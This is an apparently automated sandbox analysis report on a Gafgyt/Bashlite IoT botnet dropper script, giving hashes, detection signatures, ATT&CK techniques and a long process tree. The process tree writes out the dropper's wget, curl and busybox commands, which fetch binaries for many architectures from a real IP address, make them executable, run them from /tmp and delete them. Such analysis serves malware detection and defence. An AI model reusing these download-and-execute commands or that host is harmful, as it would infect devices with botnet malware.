gafgyt | 79397473a675a56b9fd9508c9db02b8d351be9703130d21031e7381955b6ae1d

Analysis

max time kernel
150s
max time network
149s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
10-12-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

logsbins.sh
Size

6KB
MD5

883541237878691fb889ea91320abb69
SHA1

138fb857e27f94a8b74cde31332a4d4a621e3f94
SHA256

79397473a675a56b9fd9508c9db02b8d351be9703130d21031e7381955b6ae1d
SHA512

9009d803c1c01938aca4aa2577f0fcbe8dba2262cdf3b29342b986818e1e1ffbe7570254e19cbe1926210a7dc42506aa3ab64898a9fb45c7610220950852215a
SSDEEP

192:+pdVJZVlRZZ1JhAYsk4Ik0gIIE4wUITy+WEgaIu2Uj6IjZqy/WT9TD55R2M:d

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 13 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_gafgyt
behavioral4/files/fstream-2.dat	family_gafgyt
behavioral4/files/fstream-3.dat	family_gafgyt
behavioral4/files/fstream-4.dat	family_gafgyt
behavioral4/files/fstream-5.dat	family_gafgyt
behavioral4/files/fstream-6.dat	family_gafgyt
behavioral4/files/fstream-7.dat	family_gafgyt
behavioral4/files/fstream-8.dat	family_gafgyt
behavioral4/files/fstream-9.dat	family_gafgyt
behavioral4/files/fstream-10.dat	family_gafgyt
behavioral4/files/fstream-11.dat	family_gafgyt
behavioral4/files/fstream-12.dat	family_gafgyt
behavioral4/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 54 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
727	chmod
824	chmod
925	chmod
948	chmod
988	chmod
713	chmod
905	chmod
920	chmod
1022	chmod
1057	chmod
885	chmod
1017	chmod
1052	chmod
736	chmod
776	chmod
871	chmod
900	chmod
935	chmod
972	chmod
1000	chmod
895	chmod
944	chmod
964	chmod
984	chmod
751	chmod
765	chmod
746	chmod
980	chmod
1012	chmod
756	chmod
855	chmod
1032	chmod
789	chmod
1027	chmod
1037	chmod
910	chmod
915	chmod
960	chmod
1042	chmod
1047	chmod
940	chmod
968	chmod
741	chmod
996	chmod
878	chmod
890	chmod
952	chmod
829	chmod
930	chmod
992	chmod
1005	chmod
844	chmod
956	chmod
976	chmod

Executes dropped EXE 52 IoCs

ioc	pid	Process
/tmp/m-.ips	715	m-.ips
/tmp/m-i.p.-se.l	728	m-i.p.-se.l
/tmp/s-..-h-.4	737	s-..-h-.4
/tmp/x.8-.-6.-	742	x.8-.-6.-
/tmp/a.-r.-m6	747	a.-r.-m6
/tmp/i--6.-.86	752	i--6.-.86
/tmp/p--.-pc	757	p--.-pc
/tmp/i5.-.8..-6	766	i5.-.8..-6
/tmp/m.-..-6-.-8k	777	m.-..-6-.-8k
/tmp/s-.-pa.-rc	790	s-.-pa.-rc
/tmp/a-.-r.-m.-4	825	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	830	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	845	a.r.-.m7
/tmp/m-.ips	872	m-.ips
/tmp/m-i.p.-se.l	879	m-i.p.-se.l
/tmp/s-..-h-.4	886	s-..-h-.4
/tmp/x.8-.-6.-	891	x.8-.-6.-
/tmp/a.-r.-m6	896	a.-r.-m6
/tmp/i--6.-.86	901	i--6.-.86
/tmp/p--.-pc	906	p--.-pc
/tmp/i5.-.8..-6	911	i5.-.8..-6
/tmp/m.-..-6-.-8k	916	m.-..-6-.-8k
/tmp/s-.-pa.-rc	921	s-.-pa.-rc
/tmp/a-.-r.-m.-4	926	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	931	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	936	a.r.-.m7
/tmp/p-.-.p.-.c	941	p-.-.p.-.c
/tmp/m-.ips	945	m-.ips
/tmp/m-i.p.-se.l	949	m-i.p.-se.l
/tmp/s-..-h-.4	953	s-..-h-.4
/tmp/x.8-.-6.-	957	x.8-.-6.-
/tmp/a.-r.-m6	961	a.-r.-m6
/tmp/i--6.-.86	965	i--6.-.86
/tmp/p--.-pc	969	p--.-pc
/tmp/i5.-.8..-6	973	i5.-.8..-6
/tmp/m.-..-6-.-8k	977	m.-..-6-.-8k
/tmp/s-.-pa.-rc	981	s-.-pa.-rc
/tmp/a-.-r.-m.-4	985	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	989	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	993	a.r.-.m7
/tmp/p-.-.p.-.c	997	p-.-.p.-.c
/tmp/m-.ips	1001	m-.ips
/tmp/m-i.p.-se.l	1006	m-i.p.-se.l
/tmp/s-..-h-.4	1013	s-..-h-.4
/tmp/x.8-.-6.-	1018	x.8-.-6.-
/tmp/a.-r.-m6	1023	a.-r.-m6
/tmp/i--6.-.86	1028	i--6.-.86
/tmp/p--.-pc	1033	p--.-pc
/tmp/i5.-.8..-6	1038	i5.-.8..-6
/tmp/m.-..-6-.-8k	1043	m.-..-6-.-8k
/tmp/s-.-pa.-rc	1048	s-.-pa.-rc
/tmp/a-.-r.-m.-4	1053	a-.-r.-m.-4

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	m-i.p.-se.l
File opened for modification	/dev/misc/watchdog	m-i.p.-se.l
File opened for modification	/dev/watchdog	m-i.p.-se.l
File opened for modification	/dev/misc/watchdog	m-i.p.-se.l
File opened for modification	/dev/watchdog	m-i.p.-se.l
File opened for modification	/dev/misc/watchdog	m-i.p.-se.l

Reads system routing table 1 TTPs 3 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	m-i.p.-se.l
File opened for reading	/proc/net/route	m-i.p.-se.l
File opened for reading	/proc/net/route	m-i.p.-se.l

Changes its process name 3 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	sshd	728	m-i.p.-se.l
Changes the process name, possibly in an attempt to hide itself	sshd	879	m-i.p.-se.l
Changes the process name, possibly in an attempt to hide itself	sshd	1006	m-i.p.-se.l

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	m-i.p.-se.l
File opened for reading	/proc/net/route	m-i.p.-se.l
File opened for reading	/proc/net/route	m-i.p.-se.l

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 11 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
715	m-.ips
719	rm
859	curl
872	m-.ips
945	m-.ips
1001	m-.ips
1003	rm
703	wget
875	rm
946	rm
999	busybox

Writes file to tmp directory 39 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/a.-r.-m6	wget
File opened for modification	/tmp/m.-..-6-.-8k	wget
File opened for modification	/tmp/a.r.-.m7	wget
File opened for modification	/tmp/a.r.-.m7	curl
File opened for modification	/tmp/i5.-.8..-6	busybox
File opened for modification	/tmp/s-..-h-.4	wget
File opened for modification	/tmp/m-.ips	busybox
File opened for modification	/tmp/m.-..-6-.-8k	busybox
File opened for modification	/tmp/a.-.--.r.--m-.--5	busybox
File opened for modification	/tmp/p--.-pc	busybox
File opened for modification	/tmp/i5.-.8..-6	wget
File opened for modification	/tmp/s-.-pa.-rc	wget
File opened for modification	/tmp/m-.ips	curl
File opened for modification	/tmp/x.8-.-6.-	curl
File opened for modification	/tmp/p-.-.p.-.c	curl
File opened for modification	/tmp/m-i.p.-se.l	busybox
File opened for modification	/tmp/i--6.-.86	busybox
File opened for modification	/tmp/s-.-pa.-rc	busybox
File opened for modification	/tmp/m-i.p.-se.l	wget
File opened for modification	/tmp/i--6.-.86	curl
File opened for modification	/tmp/a-.-r.-m.-4	curl
File opened for modification	/tmp/x.8-.-6.-	busybox
File opened for modification	/tmp/m-.ips	wget
File opened for modification	/tmp/a.-.--.r.--m-.--5	wget
File opened for modification	/tmp/a.-r.-m6	curl
File opened for modification	/tmp/s-..-h-.4	curl
File opened for modification	/tmp/p--.-pc	curl
File opened for modification	/tmp/s-.-pa.-rc	curl
File opened for modification	/tmp/s-..-h-.4	busybox
File opened for modification	/tmp/p--.-pc	wget
File opened for modification	/tmp/a-.-r.-m.-4	wget
File opened for modification	/tmp/i5.-.8..-6	curl
File opened for modification	/tmp/a.-.--.r.--m-.--5	curl
File opened for modification	/tmp/a-.-r.-m.-4	busybox
File opened for modification	/tmp/x.8-.-6.-	wget
File opened for modification	/tmp/i--6.-.86	wget
File opened for modification	/tmp/m-i.p.-se.l	curl
File opened for modification	/tmp/m.-..-6-.-8k	curl
File opened for modification	/tmp/a.-r.-m6	busybox

/tmp/logsbins.sh
/tmp/logsbins.sh
1⤵
PID:697
- /usr/bin/wget
  wget http://89.147.110.254/m-.ips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:703
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:713
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:715
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:719
- /usr/bin/wget
  wget http://89.147.110.254/m-i.p.-se.l
  2⤵
  - Writes file to tmp directory
  PID:720
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:727
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:728
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:732
- /usr/bin/wget
  wget http://89.147.110.254/s-..-h-.4
  2⤵
  - Writes file to tmp directory
  PID:733
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:737
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:739
- /usr/bin/wget
  wget http://89.147.110.254/x.8-.-6.-
  2⤵
  - Writes file to tmp directory
  PID:740
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:742
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:744
- /usr/bin/wget
  wget http://89.147.110.254/a.-r.-m6
  2⤵
  - Writes file to tmp directory
  PID:745
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:747
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:749
- /usr/bin/wget
  wget http://89.147.110.254/i--6.-.86
  2⤵
  - Writes file to tmp directory
  PID:750
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:754
- /usr/bin/wget
  wget http://89.147.110.254/p--.-pc
  2⤵
  - Writes file to tmp directory
  PID:755
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:756
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:757
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:759
- /usr/bin/wget
  wget http://89.147.110.254/i5.-.8..-6
  2⤵
  - Writes file to tmp directory
  PID:760
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:765
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:766
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:768
- /usr/bin/wget
  wget http://89.147.110.254/m.-..-6-.-8k
  2⤵
  - Writes file to tmp directory
  PID:770
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:777
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:780
- /usr/bin/wget
  wget http://89.147.110.254/s-.-pa.-rc
  2⤵
  - Writes file to tmp directory
  PID:782
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:789
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:790
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:794
- /usr/bin/wget
  wget http://89.147.110.254/a-.-r.-m.-4
  2⤵
  - Writes file to tmp directory
  PID:795
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:824
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:825
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:827
- /usr/bin/wget
  wget http://89.147.110.254/a.-.--.r.--m-.--5
  2⤵
  - Writes file to tmp directory
  PID:828
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:830
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:832
- /usr/bin/wget
  wget http://89.147.110.254/a.r.-.m7
  2⤵
  - Writes file to tmp directory
  PID:833
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:845
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:849
- /usr/bin/wget
  wget http://89.147.110.254/p-.-.p.-.c
  2⤵
  PID:850
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:855
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  PID:856
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:857
- /usr/bin/curl
  curl -O http://89.147.110.254/m-.ips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:859
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:871
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:872
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:875
- /usr/bin/curl
  curl -O http://89.147.110.254/m-i.p.-se.l
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:876
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:879
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:883
- /usr/bin/curl
  curl -O http://89.147.110.254/s-..-h-.4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:884
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:886
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:888
- /usr/bin/curl
  curl -O http://89.147.110.254/x.8-.-6.-
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:889
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:890
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:891
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:893
- /usr/bin/curl
  curl -O http://89.147.110.254/a.-r.-m6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:894
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://89.147.110.254/i--6.-.86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:900
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:901
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:903
- /usr/bin/curl
  curl -O http://89.147.110.254/p--.-pc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:904
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:908
- /usr/bin/curl
  curl -O http://89.147.110.254/i5.-.8..-6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:909
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:910
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:911
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:913
- /usr/bin/curl
  curl -O http://89.147.110.254/m.-..-6-.-8k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:914
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:915
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:918
- /usr/bin/curl
  curl -O http://89.147.110.254/s-.-pa.-rc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:919
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:923
- /usr/bin/curl
  curl -O http://89.147.110.254/a-.-r.-m.-4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:924
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:928
- /usr/bin/curl
  curl -O http://89.147.110.254/a.-.--.r.--m-.--5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:929
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:933
- /usr/bin/curl
  curl -O http://89.147.110.254/a.r.-.m7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:934
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:935
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:936
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:938
- /usr/bin/curl
  curl -O http://89.147.110.254/p-.-.p.-.c
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:939
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  - Executes dropped EXE
  PID:941
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:942
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:945
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:946
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:948
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  PID:949
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:950
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:952
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:953
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:954
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:956
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:957
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:958
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:960
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:961
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:962
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:964
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:965
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:966
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:970
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:973
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:974
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:976
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:977
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:978
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:980
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:981
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:982
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:984
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:985
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:986
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:988
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:989
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:990
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:992
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:993
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:994
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:996
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  - Executes dropped EXE
  PID:997
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:998
- /bin/busybox
  busybox wget -O m-.ips http://89.147.110.254/m-.ips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:999
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:1000
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1001
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:1003
- /bin/busybox
  busybox wget -O m-i.p.-se.l http://89.147.110.254/m-i.p.-se.l
  2⤵
  - Writes file to tmp directory
  PID:1004
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:1005
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1006
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:1010
- /bin/busybox
  busybox wget -O s-..-h-.4 http://89.147.110.254/s-..-h-.4
  2⤵
  - Writes file to tmp directory
  PID:1011
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:1012
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:1013
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:1015
- /bin/busybox
  busybox wget -O x.8-.-6.- http://89.147.110.254/x.8-.-6.-
  2⤵
  - Writes file to tmp directory
  PID:1016
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:1017
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:1018
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:1020
- /bin/busybox
  busybox wget -O a.-r.-m6 http://89.147.110.254/a.-r.-m6
  2⤵
  - Writes file to tmp directory
  PID:1021
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:1022
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:1023
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:1025
- /bin/busybox
  busybox wget -O i--6.-.86 http://89.147.110.254/i--6.-.86
  2⤵
  - Writes file to tmp directory
  PID:1026
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:1027
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:1028
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:1030
- /bin/busybox
  busybox wget -O p--.-pc http://89.147.110.254/p--.-pc
  2⤵
  - Writes file to tmp directory
  PID:1031
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:1032
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:1033
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:1035
- /bin/busybox
  busybox wget -O i5.-.8..-6 http://89.147.110.254/i5.-.8..-6
  2⤵
  - Writes file to tmp directory
  PID:1036
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:1037
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:1038
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:1040
- /bin/busybox
  busybox wget -O m.-..-6-.-8k http://89.147.110.254/m.-..-6-.-8k
  2⤵
  - Writes file to tmp directory
  PID:1041
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:1042
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
